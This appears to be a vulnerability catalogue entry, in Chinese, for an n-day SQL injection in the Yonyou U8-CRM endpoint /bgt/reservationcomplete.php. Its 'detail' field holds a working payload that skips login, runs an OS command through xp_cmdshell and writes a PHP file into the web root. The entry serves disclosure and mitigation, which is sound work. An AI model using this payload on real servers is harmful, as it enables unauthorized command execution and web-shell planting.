vendor = "用友"
name = "用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/bgt/reservationcomplete.php"
detail = "/bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\\U8SOFT\\turbocrm70\\code\\www\\hello.php%27;"
fix = "WAF封禁路路径，等待发布补丁"
date = "0819"
label = "nday"
